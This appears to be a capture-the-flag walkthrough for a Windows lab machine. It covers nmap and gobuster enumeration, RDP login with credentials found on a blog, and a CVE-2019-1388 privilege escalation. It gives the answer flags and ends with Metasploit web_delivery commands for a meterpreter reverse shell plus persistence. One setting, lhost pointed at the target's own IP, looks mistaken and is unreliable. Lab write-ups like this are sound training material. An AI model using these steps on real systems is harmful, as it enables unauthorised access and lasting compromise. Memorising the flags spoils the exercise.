A blast from the past!
scan the target, add -Pn option when doing with windows
nmap -sS -Pn -sV -sC -T4 10.10.194.71
view the webpage
it's default IIS windows server
enum the directories using gobuster
gobuster dir -u http://10.10.194.71 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 40
i found a hidden directory call /retro
view the webpage, we have a blog
maybe the username is wade
and i found a comment in that post may related to the password
log into the machine using remmina
10.10.194.71
wade
parzival
inside, we have a user.txt
| Flag | user.txt |
|---|---|
| Answer | THM{HACK_PLAYER_ONE} |
let's diving into the machine, find some research about hhupd.exe
it's CVE-2019-1388, run the program with administrator
click on show more detail and click show author certificate
click on the link and close the program, you will see a webpage in browser, now save the webpage
search for C:\Windows\System32\cmd.exe to open cmd
here you are, flag at Desktop of Admin account
| Flag | root.txt |
|---|---|
| Answer | THM{COIN_OPERATED_EXPLOITATION} |
now, we need to gain a remote shell access and persistence
msfconsole
use exploit/multi/script/web_delivery
options
set the options and target to PSH (powershell)
show targets
set target 2
set lhost 10.10.194.71
set lport 3389
set payload windows/meterpreter/reverse_http
run -j
Run the command on the compromised machine and a reverse shell will spawn in a new Metasploit session
run persistence -X
